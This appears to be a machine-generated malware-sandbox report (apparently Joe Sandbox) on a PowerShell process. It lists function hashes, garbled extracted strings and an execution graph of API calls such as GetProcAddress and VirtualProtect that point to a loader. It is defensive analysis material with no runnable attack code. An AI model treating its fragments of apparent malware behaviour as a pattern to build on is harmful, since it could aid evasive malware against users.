                                      • Opcode Fuzzy Hash: 4e49f5b5cf99eeb4ab0f0a424d64113d9533582430bc78cd736bebfc623f2b39
                                      • Instruction Fuzzy Hash: CF312BB1B002198BDB289A79C8507EFB7D5AF84714F14883AD919DBB40DF31D945CBE0
                                      Function 02DA7A53 Relevance: .1, Instructions: 119COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e7b150162f8de07d47cca72159fea81d1eeb1b3ee98c18f50cb5bf6c90c776d
                                      • Instruction ID: dcbfb97e1c022c3ad9f6150eebeebd6cafc8293e1177084d08d25d292ee4648a
                                      • Opcode Fuzzy Hash: 1e7b150162f8de07d47cca72159fea81d1eeb1b3ee98c18f50cb5bf6c90c776d
                                      • Instruction Fuzzy Hash: C2414C70E012489FEB14DFA9C454BADFBF2BF89344F158469D006AB7A0DB71AD45CB90
                                      Function 02DA2BB0 Relevance: .1, Instructions: 113COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7562e55b468656a533c2f7c3eba305be46b03d30bb67737447ffe82eda486b8c
                                      • Instruction ID: ff7fefb6ce8a1926dfd9ffa423bde19e7b1b35f5cb5ced2e7369b41ba39acbe2
                                      • Opcode Fuzzy Hash: 7562e55b468656a533c2f7c3eba305be46b03d30bb67737447ffe82eda486b8c
                                      • Instruction Fuzzy Hash: F6413CB4A005058FCB05CF59C5A8EAAFBB1FF48314B11815AD805AB365C736FD51CFA4
                                      Function 073B3858 Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf1889a37df27f7ee0c4a7a190a02ea7b9c36ac63d98136cc19183f1d61f01d3
                                      • Instruction ID: 44c6ad53d41e01874fa234af5578a95fcc687a36f7a9623ca0e8369768db0ef1
                                      • Opcode Fuzzy Hash: bf1889a37df27f7ee0c4a7a190a02ea7b9c36ac63d98136cc19183f1d61f01d3
                                      • Instruction Fuzzy Hash: 0531C574B41118AFE704AB68C851FAF7AA3EBC4304F108424E9056FB95CE76EC568BD1
                                      Function 073B0EEB Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02106e4d38a17970572fa9beaf7e07eb86ca71ff25e0d89b46587327b7c437d4
                                      • Instruction ID: f2687f92095222027b8aa369bc8066f1cd67efce81692961b8ff39d73a3d55db
                                      • Opcode Fuzzy Hash: 02106e4d38a17970572fa9beaf7e07eb86ca71ff25e0d89b46587327b7c437d4
                                      • Instruction Fuzzy Hash: 42317DB17093C72FE729067988957A77FA19F82310F1844A6E64CCFAC3C625E845C362
                                      Function 073B0F08 Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6189563fd5b0492cbe0f446a52edd51041927b37b5f778b9155275565f125f6d
                                      • Instruction ID: d7ba2889c42d66bdd6a65da4583c3e2a64e72fc93feaf92c341c52ef8daee7e0
                                      • Opcode Fuzzy Hash: 6189563fd5b0492cbe0f446a52edd51041927b37b5f778b9155275565f125f6d
                                      • Instruction Fuzzy Hash: 102149F17053066BE73859AA8891B7B76CAABC4711F24882AA60DCBBC0CD75E845C361
                                      Function 02DA9597 Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4a4cba95111e177ead1bfdd9ed42c76442f5547be70eb726855ec34327be66b
                                      • Instruction ID: 5e81b210894131b289a9d36aa65527075989cc74b9b069ee4d2c43a8425e6d99
                                      • Opcode Fuzzy Hash: c4a4cba95111e177ead1bfdd9ed42c76442f5547be70eb726855ec34327be66b
                                      • Instruction Fuzzy Hash: 39211774A042599FCB00CF98D9909AEBBF5FF89310B1584A9E909AB352C731FD41CBA1
                                      Function 02DAEDCB Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fef8126d0e8c1cf9ef11b8ac8e86ec5999530a27dba0d042716cd5542a21f901
                                      • Instruction ID: 09ff1f31dfcf5d1b0576e854165a7bc261ff013db29ef24679e343f4264a3ca1
                                      • Opcode Fuzzy Hash: fef8126d0e8c1cf9ef11b8ac8e86ec5999530a27dba0d042716cd5542a21f901
                                      • Instruction Fuzzy Hash: 1F119530D00159CBDF34DB94E5A8BECB7B2AB0531AF14243AC041B6290EB785D8ACF56
                                      Function 02CFD01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165011999.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2cfd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 888d3ec6f6e6faa34050f90f728dd1911a6bf9569c42ee0719818c6c37687bc4
                                      • Instruction ID: 1904826b29aafa915e3730fab7307355376c85fa15612df6f71d7be276a26627
                                      • Opcode Fuzzy Hash: 888d3ec6f6e6faa34050f90f728dd1911a6bf9569c42ee0719818c6c37687bc4
                                      • Instruction Fuzzy Hash: A1012B310083009AE7908A26CDC4767BFD8DF81324F18C52AEE0A0B546C779D985C6F1
                                      Function 02CFD01C Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165011999.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2cfd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c91542a3f68734018c6ca2206cb2036f6995e77051c4fc9c5b0db90344711c1
                                      • Instruction ID: 3c6d91074281bf5b94a2e0b458d34f90c5d5bfc7f58b9e15c95eaa77050016d1
                                      • Opcode Fuzzy Hash: 7c91542a3f68734018c6ca2206cb2036f6995e77051c4fc9c5b0db90344711c1
                                      • Instruction Fuzzy Hash: BAF0C272004340AEE7508A16CC84B63FFA8EB81234F18C45AEE480F686C3799885CAB1
                                      Function 073B0016 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8db2d81d4e81fc5afbb0f6779c1760d1772db7cb54348f51d10630f43d1e2310
                                      • Instruction ID: bebcee16088f1cf5c9eec38f8fe235218b92add1ca0ea8cc8fb13a06b4fc6e84
                                      • Opcode Fuzzy Hash: 8db2d81d4e81fc5afbb0f6779c1760d1772db7cb54348f51d10630f43d1e2310
                                      • Instruction Fuzzy Hash: 37F0FFA200E3C29FE75703209CB21963FB09E4721072A06C7C695CF8E3C16C4D98C7A3
                                      Function 073B0009 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22afb3ea3f8d612f0f7ab15dd8a401428d2fed51f3cc009fe6ca1bbd7259d7f0
                                      • Instruction ID: f1ef32b2612a12ea50bd5ee8933eca8368d537d3fb41b4c820e556c0cba86255
                                      • Opcode Fuzzy Hash: 22afb3ea3f8d612f0f7ab15dd8a401428d2fed51f3cc009fe6ca1bbd7259d7f0
                                      • Instruction Fuzzy Hash: 96F058A124E3C15FE3AB223498A21DA3FA59E8721472A40C7C294CF9A3C5298D59C763

                                      Non-executed Functions

                                      Function 02CFD8D0 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165011999.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2cfd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85559aaaf374473b6958de1dafffd32f8fae561da0051cd52a9374691ed5e4de
                                      • Instruction ID: 53f8185791cd8e6ff1f74f17dcffc1b110f3e02ee060566f195a54626491034f
                                      • Opcode Fuzzy Hash: 85559aaaf374473b6958de1dafffd32f8fae561da0051cd52a9374691ed5e4de
                                      • Instruction Fuzzy Hash: B0212771504240DFDB80DF58D6C0B2ABBA5FBC4724F20C679DE4A4B245CB35D946C6A2
                                      Function 073BF49D Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                      • API String ID: 0-459999756
                                      • Opcode ID: 0be2e379c3740302455ed5b5ada256b5070da235d403280e27d4c8895a240baf
                                      • Instruction ID: 1a81fe119386ae90b56ac409e52b6afc0879147821bfd82f3af22eea5441d3d5
                                      • Opcode Fuzzy Hash: 0be2e379c3740302455ed5b5ada256b5070da235d403280e27d4c8895a240baf
                                      • Instruction Fuzzy Hash: A1A12BB1B0010B9FEB348F64CD41BAA7BA2AF89310F14945AE9099FB91CB31DD45CB91
                                      Function 073B7788 Relevance: 12.9, Strings: 10, Instructions: 352COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                      • API String ID: 0-788909730
                                      • Opcode ID: b8435c92499ddd7c520a8cc4d60a19c5318ec574fd72313294937bcb387d3ee7
                                      • Instruction ID: e4c433e3af9533c66254fdbdc75999861525557c6451dc3d714837c775a29900
                                      • Opcode Fuzzy Hash: b8435c92499ddd7c520a8cc4d60a19c5318ec574fd72313294937bcb387d3ee7
                                      • Instruction Fuzzy Hash: 35C107F0B0020A9FEB34DB788455AEA77E6EBC5314F1484ABD6098FB91DB31C945CB91
                                      Function 073B7DF8 Relevance: 11.7, Strings: 9, Instructions: 422COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                      • API String ID: 0-3466928173
                                      • Opcode ID: f9d996484bc557eaa8e95298633084839eb36c1d8ad0980733d0a4cb58a438a5
                                      • Instruction ID: cd9cc02c1cc475c8746440027d812c7dc094da63a02872aebea320c6c1dba926
                                      • Opcode Fuzzy Hash: f9d996484bc557eaa8e95298633084839eb36c1d8ad0980733d0a4cb58a438a5
                                      • Instruction Fuzzy Hash: 6CD13AB5B043099FEB358B7888106EA7BE6AFC5210F1484ABD609CFB55CA31C945C7E2
                                      Function 073BEBE2 Relevance: 11.5, Strings: 9, Instructions: 210COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                      • API String ID: 0-202320237
                                      • Opcode ID: 2a4456b99669d7b78afa37573f5498cf528320cb040535e8eacb636c78a5a3ce
                                      • Instruction ID: e23af92985893dd969ff02f0f5d88e6731eb191996a44e187a016bc3ebf1d738
                                      • Opcode Fuzzy Hash: 2a4456b99669d7b78afa37573f5498cf528320cb040535e8eacb636c78a5a3ce
                                      • Instruction Fuzzy Hash: 38712EF5B80209DFE7348F5CC8506EABBA6AF84704F184469E6098FB95CB31DD45C791
                                      Function 073B7A08 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$tP^q$$^q$$^q$$^q
                                      • API String ID: 0-2481431222
                                      • Opcode ID: 3845d3f38b023b967a1c26d5e67d06724028f5f51384bdd99725867b7e9a1158
                                      • Instruction ID: 9218a2fd414287611b60f38dad9c1c8d6abedd730cc3bf60dd5d380f03780b2f
                                      • Opcode Fuzzy Hash: 3845d3f38b023b967a1c26d5e67d06724028f5f51384bdd99725867b7e9a1158
                                      • Instruction Fuzzy Hash: 577127F1B002099FEB348E28C540AEABBA2EFC5720F14846FD6199BB54DB31D945CB91
                                      Function 073B0778 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3199432138
                                      • Opcode ID: 43dda3ea7aab5cc322a18a5133f6f8756153b713c9f8de1f6930b0c2b787cf09
                                      • Instruction ID: bc2f306b50e04c3ec8d2c954495245efd02e1cb8ba55e3b6997589c8a6cf2ca5
                                      • Opcode Fuzzy Hash: 43dda3ea7aab5cc322a18a5133f6f8756153b713c9f8de1f6930b0c2b787cf09
                                      • Instruction Fuzzy Hash: 7A617AB17443098FE73C4A3884116FBBBE6AFC5210F24847AD649CBB65DA32C885C7D1
                                      Function 073BEC25 Relevance: 7.6, Strings: 6, Instructions: 138COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                      • API String ID: 0-2098638132
                                      • Opcode ID: 6532bb9c5ba32cffd80743661e4a624135be7183601bf07cd4375c0592922821
                                      • Instruction ID: 76af646bcb60a979a0bd75f1f71d9438db5cdab01f452d2b6ad9c613bac99b61
                                      • Opcode Fuzzy Hash: 6532bb9c5ba32cffd80743661e4a624135be7183601bf07cd4375c0592922821
                                      • Instruction Fuzzy Hash: E241E5F5A80206DFEB38CF5CC840BE6B7A2AF45644F588559EA499FE91C731DC40CB91
                                      Function 073B0470 Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 62cfaa0a05d4b5b1d89d61da545dcd7000804f278d07337a57d5d8dd4517e66c
                                      • Instruction ID: 36d9654644f3494de11b44706fbdc04071955bc81c641f6db1e7772167483248
                                      • Opcode Fuzzy Hash: 62cfaa0a05d4b5b1d89d61da545dcd7000804f278d07337a57d5d8dd4517e66c
                                      • Instruction Fuzzy Hash: 054138F0B0830A9FEB395A3488506FF7BA1AF86210F10446BD609CBE91DB31C945CB92
                                      Function 073B23F8 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 717f6d13897d209186864fc3594d1dc3fda7c8f09e0c205fa080e9f8f5676a66
                                      • Instruction ID: 87b5107d223a5cc8375ee963511068aca6afaf41652cc799580521fea90e4689
                                      • Opcode Fuzzy Hash: 717f6d13897d209186864fc3594d1dc3fda7c8f09e0c205fa080e9f8f5676a66
                                      • Instruction Fuzzy Hash: D14138F1B1022ACFEB394E2984542F7B7D5BBC5210F24866BDA1C8FE55CA31C545C751
                                      Function 073BEF7D Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 2e2f5763f46b5a46537fda68df9d895f569a837bdc6413153d0d0608e490d213
                                      • Instruction ID: 563ffe8ddf2536510717f2ed0ca59d5ae20908691e136db07727dd26a4a10cf1
                                      • Opcode Fuzzy Hash: 2e2f5763f46b5a46537fda68df9d895f569a837bdc6413153d0d0608e490d213
                                      • Instruction Fuzzy Hash: A43146F2B4420B8FFB344A6998006F6B7E9AFC5211F24447BC60D8BA65CA36C485C762
                                      Function 073B79FE Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                      • API String ID: 0-3997570045
                                      • Opcode ID: afdb60f4033a1e66b0d9f136d35f43cf7ac49da9823776026cb320a1b3c80ddb
                                      • Instruction ID: 95ffabf60710135896b4b3195c57b01afac195b22be8776c8b91a10c10ac11f5
                                      • Opcode Fuzzy Hash: afdb60f4033a1e66b0d9f136d35f43cf7ac49da9823776026cb320a1b3c80ddb
                                      • Instruction Fuzzy Hash: 4B41BFF1A00206AFFB34CE14C544BE5B7A6EBC5720F09846BD6195BA90CB31D984CF91
                                      Function 073BED26 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                      • API String ID: 0-3846404929
                                      • Opcode ID: bb562e2d8f0fbdcb50c0c75147c4fd2b476cc8471ccc612da41ec03243a9ca26
                                      • Instruction ID: 044919eb16aaed8770f87795c403be464df8420ee597d1242b1bace87600dffa
                                      • Opcode Fuzzy Hash: bb562e2d8f0fbdcb50c0c75147c4fd2b476cc8471ccc612da41ec03243a9ca26
                                      • Instruction Fuzzy Hash: C831B1B5B40115DFDB28CF98C444AEABBA2BF88710F288559EA09ABB51C731DC41CBD1
                                      Function 073BE4F0 Relevance: 5.5, Strings: 4, Instructions: 488COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o^q$(o^q$(o^q$(o^q
                                      • API String ID: 0-1978863864
                                      • Opcode ID: ec01d6e079ce85f28cf112c322313beb68fbf5e6446ad80295b676c2ddc82662
                                      • Instruction ID: 924f372e300ff742edfb305fd07661d41d2fdbc906eb2fa8219c797dcb0a504e
                                      • Opcode Fuzzy Hash: ec01d6e079ce85f28cf112c322313beb68fbf5e6446ad80295b676c2ddc82662
                                      • Instruction Fuzzy Hash: 44F159B1784306DFEB248F6CC841BEA7BA6BF85310F14846AE609CFA91DB35C845C791
                                      Function 073BAEA8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q$$^q$$^q
                                      • API String ID: 0-2125118731
                                      • Opcode ID: 9c67093469dd651270432d3803b249583e48524fff74d11d707c7b5118f36fde
                                      • Instruction ID: 47df5b80a96586f2681e65a01c68fd3e9ebd1ec73e788976430ca5e736eec4dc
                                      • Opcode Fuzzy Hash: 9c67093469dd651270432d3803b249583e48524fff74d11d707c7b5118f36fde
                                      • Instruction Fuzzy Hash: 222135F170460AABE734596A8C00BE7B6DA9BC5710F24C82BA60DCBB85DE31E8448361
                                      Function 073B7DDB Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q$$^q$$^q
                                      • API String ID: 0-2125118731
                                      • Opcode ID: 72251b889ad6e32eabdd2cc603e9bfbd268bc0eb528230a9b660e96f1c75f741
                                      • Instruction ID: 7de359c32a2cd830ac9c5f4e1a0c0afd8f57db867fd10ef0475e5814e00ccc39
                                      • Opcode Fuzzy Hash: 72251b889ad6e32eabdd2cc603e9bfbd268bc0eb528230a9b660e96f1c75f741
                                      • Instruction Fuzzy Hash: A721E6F691534A8FFF318EA494405EABBB4EFD2220F1540BBDA0C8FA42D7359949C791
                                      Function 073B030A Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q
                                      • API String ID: 0-2049395529
                                      • Opcode ID: 25f9ff3e15ccac80add5927ac0607b8cebbefbe56b5f684ca417ba5440430c1e
                                      • Instruction ID: 726c96c904dd4b57f603333cb796b3356eb639d58d1615b2d97958d9a044f6a3
                                      • Opcode Fuzzy Hash: 25f9ff3e15ccac80add5927ac0607b8cebbefbe56b5f684ca417ba5440430c1e
                                      • Instruction Fuzzy Hash: 3C0184A1A0E3C68FD72B163848641566FB2AFC364072E44DBC189CFB5BCE258C4D8797

                                      Execution Graph

                                      Execution Coverage:1.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0.5%
                                      Total number of Nodes:214
                                      Total number of Limit Nodes:5
                                      execution_graph 9025 23bcc7a7 9026 23bcc7be 9025->9026 9031 23bcc82c 9025->9031 9026->9031 9037 23bcc7e6 GetModuleHandleA 9026->9037 9027 23bcc835 GetModuleHandleA 9030 23bcc83f 9027->9030 9028 23bcc872 9030->9030 9030->9031 9033 23bcc85f GetProcAddress 9030->9033 9031->9027 9031->9028 9031->9030 9032 23bcc7dd 9032->9030 9032->9031 9034 23bcc800 GetProcAddress 9032->9034 9033->9031 9034->9031 9035 23bcc80d VirtualProtect 9034->9035 9035->9031 9036 23bcc81c VirtualProtect 9035->9036 9036->9031 9038 23bcc7ef 9037->9038 9043 23bcc82c 9037->9043 9049 23bcc803 GetProcAddress 9038->9049 9040 23bcc835 GetModuleHandleA 9048 23bcc83f 9040->9048 9041 23bcc872 9042 23bcc7f4 9042->9043 9044 23bcc800 GetProcAddress 9042->9044 9043->9040 9043->9041 9043->9048 9044->9043 9045 23bcc80d VirtualProtect 9044->9045 9045->9043 9046 23bcc81c VirtualProtect 9045->9046 9046->9043 9047 23bcc85f GetProcAddress 9047->9043 9048->9043 9048->9047 9050 23bcc82c 9049->9050 9051 23bcc80d VirtualProtect 9049->9051 9053 23bcc835 GetModuleHandleA 9050->9053 9054 23bcc872 9050->9054 9051->9050 9052 23bcc81c VirtualProtect 9051->9052 9052->9050 9056 23bcc83f 9053->9056 9055 23bcc85f GetProcAddress 9055->9056 9056->9050 9056->9055 8799 23bc1c5b 8800 23bc1c6b ___scrt_fastfail 8799->8800 8803 23bc12ee 8800->8803 8802 23bc1c87 8804 23bc1324 ___scrt_fastfail 8803->8804 8805 23bc13b7 GetEnvironmentVariableW 8804->8805 8829 23bc10f1 8805->8829 8808 23bc10f1 57 API calls 8809 23bc1465 8808->8809 8810 23bc10f1 57 API calls 8809->8810 8811 23bc1479 8810->8811 8812 23bc10f1 57 API calls 8811->8812 8813 23bc148d 8812->8813 8814 23bc10f1 57 API calls 8813->8814 8815 23bc14a1 8814->8815 8816 23bc10f1 57 API calls 8815->8816 8817 23bc14b5 lstrlenW 8816->8817 8818 23bc14d9 lstrlenW 8817->8818 8819 23bc14d2 8817->8819 8820 23bc10f1 57 API calls 8818->8820 8819->8802 8821 23bc1501 lstrlenW lstrcatW 8820->8821 8822 23bc10f1 57 API calls 8821->8822 8823 23bc1539 lstrlenW lstrcatW 8822->8823 8824 23bc10f1 57 API calls 8823->8824 8825 23bc156b lstrlenW lstrcatW 8824->8825 8826 23bc10f1 57 API calls 8825->8826 8827 23bc159d lstrlenW lstrcatW 8826->8827 8828 23bc10f1 57 API calls 8827->8828 8828->8819 8830 23bc1118 